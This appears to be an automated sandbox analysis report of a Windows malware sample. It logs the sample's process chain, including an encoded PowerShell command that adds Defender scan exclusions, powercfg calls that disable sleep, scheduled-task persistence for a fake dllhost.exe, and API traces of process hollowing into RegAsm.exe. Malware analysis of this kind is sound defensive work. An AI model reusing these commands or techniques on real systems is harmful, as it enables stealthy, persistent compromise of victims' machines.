                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                        Start time:03:44:20
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x310000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                        Start time:03:44:20
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x310000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                        Start time:03:44:20
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x310000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                        Start time:03:44:20
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x310000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                        Start time:03:44:20
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x310000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                        Start time:03:44:20
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x310000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                        Start time:03:44:20
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x310000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                        Start time:03:44:20
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:attrib +H "Installer.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff749420000
                                                                                                                                                                                                                                        File size:23'040 bytes
                                                                                                                                                                                                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                        Start time:03:44:20
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\Installer.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"Installer.exe"
                                                                                                                                                                                                                                        Imagebase:0x300000
                                                                                                                                                                                                                                        File size:625'464 bytes
                                                                                                                                                                                                                                        MD5 hash:89A069871324D35E25922F6FB881D514
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000016.00000002.2282337473.000000000045A000.00000004.00000001.01000000.0000000D.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                        Start time:03:44:21
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                                                        Imagebase:0xda0000
                                                                                                                                                                                                                                        File size:45'984 bytes
                                                                                                                                                                                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                        Start time:03:44:22
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                                                                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                        Start time:03:44:22
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                        Start time:03:44:22
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A"
                                                                                                                                                                                                                                        Imagebase:0xf10000
                                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                        Start time:03:44:23
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                        Imagebase:0x7ff6ef0c0000
                                                                                                                                                                                                                                        File size:496'640 bytes
                                                                                                                                                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                        Start time:03:44:25
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                        Start time:03:44:25
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7625" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                        Start time:03:44:25
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                        Start time:03:44:25
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                        Start time:03:44:25
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                                                                                                                                                                                                        Imagebase:0x8e0000
                                                                                                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:37.2%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                          Signature Coverage:21.4%
                                                                                                                                                                                                                                          Total number of Nodes:28
                                                                                                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                                                                                                          execution_graph 560 25d0979 561 25d09aa 560->561 562 25d0ae2 561->562 563 25d1279 VirtualProtectEx 561->563 564 25d1340 VirtualProtectEx 561->564 565 25d1280 VirtualProtectEx 561->565 563->562 564->562 565->562 526 25d0988 527 25d09aa 526->527 528 25d0ae2 527->528 532 25d1279 527->532 536 25d1280 527->536 540 25d1340 527->540 533 25d1280 VirtualProtectEx 532->533 535 25d130f 533->535 535->528 537 25d12cb VirtualProtectEx 536->537 539 25d130f 537->539 539->528 541 25d12fc VirtualProtectEx 540->541 542 25d1347 540->542 543 25d130f 541->543 542->528 543->528 544 27f2139 547 27f2171 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 544->547 546 27f234e WriteProcessMemory 548 27f2393 546->548 547->546 549 27f2398 WriteProcessMemory 548->549 550 27f23d5 WriteProcessMemory Wow64SetThreadContext ResumeThread 548->550 549->548 557 27f2474 558 27f240f Wow64SetThreadContext ResumeThread 557->558 559 27f247b 557->559

                                                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                                                                          callgraph 0 Function_025D045C 1 Function_025D04D9 2 Function_025D0BD9 3 Function_025D0558 4 Function_025D08D8 5 Function_025D01D5 6 Function_025D04D5 7 Function_025D0154 8 Function_025D00D4 9 Function_025D0A57 9->3 12 Function_025D0B50 9->12 15 Function_025D054C 9->15 21 Function_025D0540 9->21 23 Function_025D1340 9->23 28 Function_025D1279 9->28 44 Function_025D0C67 9->44 61 Function_025D1280 9->61 10 Function_027F2474 11 Function_025D04D1 13 Function_025D0450 14 Function_025D004D 36 Function_025D026C 15->36 16 Function_025D0148 17 Function_025D00C8 18 Function_025D0848 19 Function_025D0244 20 Function_025D0444 21->36 22 Function_025D01C0 24 Function_025D047D 25 Function_025D027C 26 Function_025D0479 27 Function_025D0979 27->3 27->12 27->15 27->21 27->23 27->28 27->44 27->61 68 Function_025D0534 27->68 29 Function_025D0178 30 Function_025D01F8 31 Function_025D0475 32 Function_025D0471 33 Function_025D0070 34 Function_025D00F0 35 Function_025D046D 37 Function_025D01EC 38 Function_025D04EF 39 Function_025D0F6F 39->36 40 Function_025D0469 41 Function_025D08E8 42 Function_025D0165 43 Function_025D00E4 44->36 45 Function_025D0060 46 Function_025D0260 47 Function_025D011C 48 Function_025D0198 49 Function_027F2139 50 Function_025D0214 51 Function_025D0090 52 Function_025D048D 53 Function_025D010C 54 Function_025D0489 55 Function_025D0988 55->3 55->12 55->15 55->21 55->23 55->28 55->44 55->61 55->68 56 Function_025D0188 57 Function_025D0208 58 Function_025D0485 59 Function_025D1104 59->36 60 Function_025D0481 62 Function_025D0100 63 Function_025D0080 64 Function_027F1D1F 65 Function_025D00BC 66 Function_025D013C 67 Function_025D10BC 67->36 69 Function_025D01B4 70 Function_025D0234 71 Function_025D10B6 72 Function_027F1F92 73 Function_025D00B0 74 Function_025D012C 75 Function_025D122C 75->36 76 Function_025D01A8 77 Function_025D04A8 78 Function_025D0224 79 Function_025D1226 80 Function_025D00A0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,027F20AB,027F209B), ref: 027F22A8
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 027F22BB
                                                                                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 027F22D9
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(00000098,?,027F20EF,00000004,00000000), ref: 027F22FD
                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(00000098,?,?,00003000,00000040), ref: 027F2328
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(00000098,00000000,?,?,00000000,?), ref: 027F2380
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(00000098,00400000,?,?,00000000,?,00000028), ref: 027F23CB
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(00000098,?,?,00000004,00000000), ref: 027F2409
                                                                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(00000088,027C0000), ref: 027F2445
                                                                                                                                                                                                                                          • ResumeThread.KERNELBASE(00000088), ref: 027F2454
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2055020311.00000000027F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F1000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_27f1000_inject.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                          • API String ID: 2687962208-1257834847
                                                                                                                                                                                                                                          • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                          • Instruction ID: 3629bf89f359c2359cab8b2d00c0f645df68379cbbb6c1cbc20758d3dcc9f73a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63B1E67664424AAFDB60CF68CC80BDA77A5FF88714F158124EA0CAB342D774FA41CB94

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 23 27f2474-27f2479 24 27f240f-27f2457 Wow64SetThreadContext ResumeThread 23->24 25 27f247b 23->25
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(00000088,027C0000), ref: 027F2445
                                                                                                                                                                                                                                          • ResumeThread.KERNELBASE(00000088), ref: 027F2454
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2055020311.00000000027F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F1000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_27f1000_inject.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Thread$ContextResumeWow64
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1826235168-0
                                                                                                                                                                                                                                          • Opcode ID: fe9982208852559af648ca994f0b27598504c0bbc20a60b0a84108364e5c6592
                                                                                                                                                                                                                                          • Instruction ID: 3558000635f5cba232c9a878e3cfcbd7d76c74a61d4d945517e9b0dfa7834452
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe9982208852559af648ca994f0b27598504c0bbc20a60b0a84108364e5c6592
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6F030721083459BCB70CF59CCC0BC9B3A9FF89320F190011DA4C8B702D774BA118B91

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 26 25d1340-25d1345 27 25d12fc-25d130d VirtualProtectEx 26->27 28 25d1347-25d139a 26->28 29 25d130f 27->29 30 25d1314-25d1335 27->30 32 25d139c-25d13a4 28->32 33 25d13a6-25d13db 28->33 29->30 32->33 36 25d13dd-25d13e3 33->36 37 25d13e4-25d13f8 33->37 36->37
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 025D1300
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2054942926.00000000025D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_25d0000_inject.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                          • Opcode ID: 442714d5a50834f4ff5d70b87106b2381d560e32f79d8eb938c7b448c3c66d74
                                                                                                                                                                                                                                          • Instruction ID: cf3005b403c31ea54b04b1136a579b92e3ca2f2e7d84a4c5d92f61c178636fc7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 442714d5a50834f4ff5d70b87106b2381d560e32f79d8eb938c7b448c3c66d74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 173111B69016488FCF20DFAAD884BDEBBF0BB49314F14811AD909AB251D3789544CBA5

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 40 25d1279-25d130d VirtualProtectEx 45 25d130f 40->45 46 25d1314-25d1335 40->46 45->46
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 025D1300
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2054942926.00000000025D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_25d0000_inject.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                          • Opcode ID: 10a5bbe5f8f76905aab0136197442fb2e4c2a1eb4f55a174ccf6ae65c18eb2c6
                                                                                                                                                                                                                                          • Instruction ID: a6f382e860f749441a2cfe39acacb9663a1ec35a82116433dcf6de36aa1d7337
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10a5bbe5f8f76905aab0136197442fb2e4c2a1eb4f55a174ccf6ae65c18eb2c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A72104B59006499FDF10DFAAC881ADEFBF4FF48310F108429E559A7250C774A941CBA5

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 49 25d1280-25d130d VirtualProtectEx 53 25d130f 49->53 54 25d1314-25d1335 49->54 53->54
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 025D1300
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2054942926.00000000025D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_25d0000_inject.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                          • Opcode ID: 2f647a12cb54b4f56878f7e1001cf255c4f8c14ed4d3c0f46ef98aed83742025
                                                                                                                                                                                                                                          • Instruction ID: 8649ac2c7757719e21467ea6a2f11f7c35da95e7c0ab5575b1c14e556f445d45
